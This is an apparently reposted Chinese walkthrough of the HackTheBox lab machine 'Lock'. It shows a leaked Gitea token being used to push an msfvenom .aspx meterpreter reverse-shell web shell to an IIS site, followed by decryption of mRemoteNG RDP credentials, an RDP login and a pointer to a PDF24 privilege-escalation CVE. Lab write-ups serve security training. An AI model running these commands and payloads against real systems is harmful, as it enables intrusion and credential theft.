【渗透测试】HTB靶场之Lock 全过程wp

news2026/3/29 17:43:09

息收集目标ip:10.129.234.64kali ip:10.10.16.4┌──(root㉿kali)-[~/桌面/HTB]└─# nmap -A -T4 10.129.234.64Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-15 01:34 ESTNmap scan report for 10.129.234.64Host is up (0.30s latency).Not shown: 996 filtered tcp ports (no-response)PORT STATE SERVICE VERSION80/tcp open http Microsoft IIS httpd 10.0|_http-server-header: Microsoft-IIS/10.0|_http-title: Lock - Index| http-methods:|_ Potentially risky methods: TRACE445/tcp open microsoft-ds?3000/tcp open http Golang net/http server|_http-title: Gitea: Git with a cup of tea| fingerprint-strings:| GenericLines, Help, RTSPRequest:| HTTP/1.1 400 Bad Request| Content-Type: text/plain; charsetutf-8| Connection: close| Request| GetRequest:| HTTP/1.0 200 OK| Cache-Control: max-age0, private, must-revalidate, no-transform| Content-Type: text/html; charsetutf-8| Set-Cookie: i_like_gitea74301fab8c80b509; Path/; HttpOnly; SameSiteLax| Set-Cookie: _csrf7YhSALV0ZBSIvHetLhey94Wp5Es6MTc3MTEzNzQyMDEwNTU1NjcwMA; Path/; Max-Age86400; HttpOnly; SameSiteLax| X-Frame-Options: SAMEORIGIN| Date: Sun, 15 Feb 2026 06:37:00 GMT| !DOCTYPE html| html langen-US classtheme-auto| head| meta nameviewport contentwidthdevice-width, initial-scale1| titleGitea: Git with a cup of tea/title| link relmanifest hrefdata:application/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG9mIHRlYSIsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic3RhcnRfdXJsIjoiaHR0cDovL2xvY2FsaG9zdDozMDAwLyIsImljb25zIjpbeyJzcmMiOiJodHRwOi8vbG9jYWxob3N0OjMwMDAvYXNzZXRzL2ltZy9sb2dvLnBuZyIsInR5cGUiOiJpbWFnZS9wbmciLCJzaXplcyI6IjU| HTTPOptions:| HTTP/1.0 405 Method Not Allowed| Allow: HEAD| Allow: GET| Cache-Control: max-age0, private, must-revalidate, no-transform| Set-Cookie: i_like_giteac9a200de20c43a71; Path/; HttpOnly; SameSiteLax| Set-Cookie: _csrf_WL4mnt6F0jUe2zby5-7FVfiMSY6MTc3MTEzNzQyMTM0NTI4NDgwMA; Path/; Max-Age86400; HttpOnly; SameSiteLax| X-Frame-Options: SAMEORIGIN| Date: Sun, 15 Feb 2026 06:37:01 GMT|_ Content-Length: 03389/tcp open ms-wbt-server Microsoft Terminal Services|_ssl-date: 2026-02-15T06:38:1600:00; 1m58s from scanner time.| ssl-cert: Subject: commonNameLock| Not valid before: 2026-02-14T06:34:21|_Not valid after: 2026-08-16T06:34:21| rdp-ntlm-info:| Target_Name: LOCK| NetBIOS_Domain_Name: LOCK| NetBIOS_Computer_Name: LOCK| DNS_Domain_Name: Lock| DNS_Computer_Name: Lock| Product_Version: 10.0.20348|_ System_Time: 2026-02-15T06:37:3700:001 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :SF-Port3000-TCP:V7.95%I7%D2/15%Time69916916%Px86_64-pc-linux-gnu%r(GeSF:nericLines,67,HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20tSF:ext/plain;\x20charsetutf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\xSF:20Request)%r(GetRequest,3000,HTTP/1\.0\x20200\x20OK\r\nCache-Control:SF:\x20max-age0,\x20private,\x20must-revalidate,\x20no-transform\r\nConteSF:nt-Type:\x20text/html;\x20charsetutf-8\r\nSet-Cookie:\x20i_like_giteaSF:74301fab8c80b509;\x20Path/;\x20HttpOnly;\x20SameSiteLax\r\nSet-CookieSF::\x20_csrf7YhSALV0ZBSIvHetLhey94Wp5Es6MTc3MTEzNzQyMDEwNTU1NjcwMA;\x20PSF:ath/;\x20Max-Age86400;\x20HttpOnly;\x20SameSiteLax\r\nX-Frame-OptionSF:s:\x20SAMEORIGIN\r\nDate:\x20Sun,\x2015\x20Feb\x202026\x2006:37:00\x20GSF:MT\r\n\r\n!DOCTYPE\x20html\nhtml\x20lang\en-US\\x20class\theme-SF:auto\\nhead\n\tmeta\x20name\viewport\\x20content\widthdeviceSF:-width,\x20initial-scale1\\n\ttitleGitea:\x20Git\x20with\x20a\x20cSF:up\x20of\x20tea/title\n\tlink\x20rel\manifest\\x20href\data:appSF:lication/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG9mIHRlYSSF:IsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic3RhcnRfdSF:XJsIjoiaHR0cDovL2xvY2FsaG9zdDozMDAwLyIsImljb25zIjpbeyJzcmMiOiJodHRwOi8vSF:bG9jYWxob3N0OjMwMDAvYXNzZXRzL2ltZy9sb2dvLnBuZyIsInR5cGUiOiJpbWFnZS9wbmcSF:iLCJzaXplcyI6IjU)%r(Help,67,HTTP/1\.1\x20400\x20Bad\x20Request\r\nConSF:tent-Type:\x20text/plain;\x20charsetutf-8\r\nConnection:\x20close\r\n\SF:r\n400\x20Bad\x20Request)%r(HTTPOptions,197,HTTP/1\.0\x20405\x20MethoSF:d\x20Not\x20Allowed\r\nAllow:\x20HEAD\r\nAllow:\x20GET\r\nCache-ControlSF::\x20max-age0,\x20private,\x20must-revalidate,\x20no-transform\r\nSet-SF:Cookie:\x20i_like_giteac9a200de20c43a71;\x20Path/;\x20HttpOnly;\x20SaSF:meSiteLax\r\nSet-Cookie:\x20_csrf_WL4mnt6F0jUe2zby5-7FVfiMSY6MTc3MTEzSF:NzQyMTM0NTI4NDgwMA;\x20Path/;\x20Max-Age86400;\x20HttpOnly;\x20SameSiSF:teLax\r\nX-Frame-Options:\x20SAMEORIGIN\r\nDate:\x20Sun,\x2015\x20Feb\SF:x202026\x2006:37:01\x20GMT\r\nContent-Length:\x200\r\n\r\n)%r(RTSPRequSF:est,67,HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plaSF:in;\x20charsetutf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20RequeSF:st);Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portDevice type: general purposeRunning (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)No exact OS matches for host (test conditions non-ideal).Network Distance: 2 hopsService Info: OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:| smb2-time:| date: 2026-02-15T06:37:38|_ start_date: N/A| smb2-security-mode:| 3:1:1:|_ Message signing enabled but not required|_clock-skew: mean: 1m57s, deviation: 0s, median: 1m57sTRACEROUTE (using port 3389/tcp)HOP RTT ADDRESS1 349.42 ms 10.10.16.12 349.72 ms 10.129.234.64OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 109.87 seconds发现开放了4个端口80、445、3000、3389在左上的探索下位于公共仓库中有一段python编写的代码import requestsimport sysimport osdef format_domain(domain):if not domain.startswith((http://, https://)):domain https:// domainreturn domaindef get_repositories(token, domain):headers {Authorization: ftoken {token}}url f{domain}/api/v1/user/reposresponse requests.get(url, headersheaders)if response.status_code 200:return response.json()else:raise Exception(fFailed to retrieve repositories: {response.status_code})def main():if len(sys.argv) 2:print(Usage: python script.py gitea_domain)sys.exit(1)gitea_domain format_domain(sys.argv[1])personal_access_token os.getenv(GITEA_ACCESS_TOKEN)if not personal_access_token:print(Error: GITEA_ACCESS_TOKEN environment variable not set.)sys.exit(1)try:repos get_repositories(personal_access_token, gitea_domain)print(Repositories:)for repo in repos:print(f- {repo[full_name]})except Exception as e:print(fError: {e})if __name__ __main__:main()这是一个用于通过 Gitea API 获取用户仓库列表的 Python 脚本通过个人访问令牌进行身份验证。核心功能身份验证使用 Gitea 个人访问令牌API 调用调用 Gitea 的 /api/v1/user/repos端点域名处理自动添加 HTTPS 协议前缀仓库展示输出用户的所有仓库完整名称查看提交历史可以看到PERSONAL_ACCESS_TOKENPERSONAL_ACCESS_TOKEN 43ce39bb0bd6bc489284f2905f033ca467a6362f我们将脚本复制到kali里面并设置环境变量我们可以看到有两个仓库dev-scripts和website这里有两个方法1.git我们已经了解了dev-scripts所以接下来我们将克隆website仓库。但是现在没有密码只有tokengit允许token当作密码使用这可以通过使用git clone命令并同时提供访问令牌来完成。git clone https://username:tokengitea-domain/owner/repository.gitgit clone http://43ce39bb0bd6bc489284f2905f033ca467a6362f10.129.234.64:3000/ellen.freeman/website2.curlcurl http://10.129.234.64:3000/api/v1/user/repos -H Authorization: Bearer 43ce39bb0bd6bc489284f2905f033ca467a6362f -s | jq .[{id: 1,owner: {id: 2,login: ellen.freeman,login_name: ,full_name: ,email: ellen.freemanlock.vl,avatar_url: http://localhost:3000/avatar/1aea7e43e6bb8891439a37854255ed74,language: ,is_admin: false,last_login: 0001-01-01T00:00:00Z,created: 2023-12-27T11:13:10-08:00,restricted: false,active: false,prohibit_login: false,location: ,website: ,description: ,visibility: public,followers_count: 0,following_count: 0,starred_repos_count: 0,username: ellen.freeman},name: dev-scripts,full_name: ellen.freeman/dev-scripts,description: ,empty: false,private: false,fork: false,template: false,parent: null,mirror: false,size: 29,language: Python,languages_url: http://localhost:3000/api/v1/repos/ellen.freeman/dev-scripts/languages,html_url: http://localhost:3000/ellen.freeman/dev-scripts,url: http://localhost:3000/api/v1/repos/ellen.freeman/dev-scripts,link: ,ssh_url: ellen.freemanlocalhost:ellen.freeman/dev-scripts.git,clone_url: http://localhost:3000/ellen.freeman/dev-scripts.git,original_url: ,website: ,stars_count: 0,forks_count: 0,watchers_count: 1,open_issues_count: 0,open_pr_counter: 0,release_counter: 0,default_branch: main,archived: false,created_at: 2023-12-27T11:17:47-08:00,updated_at: 2023-12-27T11:36:42-08:00,archived_at: 1969-12-31T16:00:00-08:00,permissions: {admin: true,push: true,pull: true},has_issues: true,internal_tracker: {enable_time_tracker: true,allow_only_contributors_to_track_time: true,enable_issue_dependencies: true},has_wiki: true,has_pull_requests: true,has_projects: true,has_releases: true,has_packages: true,has_actions: false,ignore_whitespace_conflicts: false,allow_merge_commits: true,allow_rebase: true,allow_rebase_explicit: true,allow_squash_merge: true,allow_rebase_update: true,default_delete_branch_after_merge: false,default_merge_style: merge,default_allow_maintainer_edit: false,avatar_url: ,internal: false,mirror_interval: ,mirror_updated: 0001-01-01T00:00:00Z,repo_transfer: null},{id: 5,owner: {id: 2,login: ellen.freeman,login_name: ,full_name: ,email: ellen.freemanlock.vl,avatar_url: http://localhost:3000/avatar/1aea7e43e6bb8891439a37854255ed74,language: ,is_admin: false,last_login: 0001-01-01T00:00:00Z,created: 2023-12-27T11:13:10-08:00,restricted: false,active: false,prohibit_login: false,location: ,website: ,description: ,visibility: public,followers_count: 0,following_count: 0,starred_repos_count: 0,username: ellen.freeman},name: website,full_name: ellen.freeman/website,description: ,empty: false,private: true,fork: false,template: false,parent: null,mirror: false,size: 7370,language: CSS,languages_url: http://localhost:3000/api/v1/repos/ellen.freeman/website/languages,html_url: http://localhost:3000/ellen.freeman/website,url: http://localhost:3000/api/v1/repos/ellen.freeman/website,link: ,ssh_url: ellen.freemanlocalhost:ellen.freeman/website.git,clone_url: http://localhost:3000/ellen.freeman/website.git,original_url: ,website: ,stars_count: 0,forks_count: 0,watchers_count: 1,open_issues_count: 0,open_pr_counter: 0,release_counter: 0,default_branch: main,archived: false,created_at: 2023-12-27T12:04:52-08:00,updated_at: 2024-01-18T10:17:46-08:00,archived_at: 1969-12-31T16:00:00-08:00,permissions: {admin: true,push: true,pull: true},has_issues: true,internal_tracker: {enable_time_tracker: true,allow_only_contributors_to_track_time: true,enable_issue_dependencies: true},has_wiki: true,has_pull_requests: true,has_projects: true,has_releases: true,has_packages: true,has_actions: false,ignore_whitespace_conflicts: false,allow_merge_commits: true,allow_rebase: true,allow_rebase_explicit: true,allow_squash_merge: true,allow_rebase_update: true,default_delete_branch_after_merge: false,default_merge_style: merge,default_allow_maintainer_edit: false,avatar_url: ,internal: false,mirror_interval: ,mirror_updated: 0001-01-01T00:00:00Z,repo_transfer: null}]字段dev-scripts 仓库website 仓库渗透测试解读仓库 ID15唯一标识API 操作时可能用到所属用户ellen.freemanellen.freeman锁定目标用户后续可围绕该用户展开枚举仓库全名full_nameellen.freeman/dev-scriptsellen.freeman/website克隆 / 访问仓库的核心标识格式为「用户名 / 仓库名」仓库类型privatefalse公共true私有website是私有仓库大概率包含敏感内容如网站源码、部署脚本重点关注主要开发语言PythonCSS提示仓库内容类型- dev-scriptsPython 脚本- website前端 / 网页代码仓库大小29 KB7370 KB约 7.2MBwebsite体积大内容更丰富是重点目标权限permissionsadmin: true / push: true / pull: trueadmin: true / push: true / pull: true你的令牌拥有该仓库的管理员权限可推送 / 修改代码这是提权关键克隆地址clone_urlhttp://localhost:3000/ellen.freeman/dev-scripts.githttp://localhost:3000/ellen.freeman/website.git可通过该地址克隆仓库到本地分析内容这表明对该存储库的任何更改都会自动改变正在托管的网站。如果我们查看此目录内的index.html页面我们会找到我们之前访问的网站的HTML内容。这意味着我们能够向该存储库提交代码它将被自动推送到该网站。我们改变changelog.txt内容然后提交后git add .git commit -m mane updategit config --global user.name ellen.freemangit config --global user.email ellen.freemangit push这时候再去刷新就可以看到更改了漏洞利用既然可以成功修改了服务器的文件由于从Nmap扫描可以确认Microsoft IIS被用作web服务器我们可以上传一个.aspx网页shell以实现远程代码执行。我们可以通过msfvenom生成此网页shellmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST10.10.16.4 LPORT4444 -f aspx test.aspx然后我们使用msfconsole启动监听器以便在webshell触发后捕获反向shellmsfconsole -q -x use exploit/multi/handler;set PAYLOAD windows/x64/meterpreter/reverse_tcp;set LHOST 10.10.16.4;set LPORT 4444;rungit add test.aspxgit commit -m reverse shellgit push再回到website目录下去访问test.aspx得到shell在C:\Gitea\data下有一个gitea.db的数据库文件我们尝试使用445端口smb共享但是没有权限使用gitea命令更改管理员密码.\gitea admin user change-password -u administrator -p chenzi123发现修改成功成功登陆但是并没有什么东西字段名取值渗透测试解读EncryptionEngineAES密码的加密算法是 AESGCM 模式这是解密的关键前提BlockCipherModeGCMAES 的分组密码模式解密工具需要匹配这个模式KdfIterations1000密钥派生函数的迭代次数解密时需要用到ProtectedsDkrKn0JrG4oAL4GW8BctmMNAJfcdu/ahPSQn3W5DPC3vPRiNwfo7OH11trVPbhwpy1FnqfcPQZ3olLRyDhDFpmRemoteNG 的主加密密钥Base64 编码解密密码必须依赖这个值NameRDP/Gale这个连接配置的名称指向用户 GaleUsernameGale.Dekarios靶机上的有效用户账号核心后续登录 / 提权要用PasswordTYkZkvR2YmVlm2T2jBYTEhPU2VafgW1d9NSdDXhUYwBePQ/2qKx57IeOROXhJxA7CczQzr1nRm89JulQDWPw该用户的加密密码Base64 编码需要解密成明文HostnameLock连接的目标主机名即靶机本身ProtocolRDP连接协议是 RDP远程桌面端口 3389Port3389RDP 默认端口解密密码后可尝试远程登录加密密码TYkZkvR2YmVlm2T2jBYTEhPU2VafgW1d9NSdDXhUYwBePQ/2qKx57IeOROXhJxA7CczQzr1nRm89JulQDWPw我们可以使用mRemoteNG进行解密git clone https://github.com/kmahyyg/mremoteng-decryptpython mremoteng_decrypt.py -rf config.xmlUsername: Gale.DekariosHostname: LockPassword: ty8wnW9qCKDosXo6发现内容信息里有关RDP成功获取RDP凭据。使用这些凭据我们可以建立到该机器的RDP会话。xfreerdp /v:10.129.234.64 /u:Gale.Dekarios /p:ty8wnW9qCKDosXo6成功在桌面得到flag权限提升利用CVE-2023-49147中的PDF24漏洞获取NT系统权限

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/2462189.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！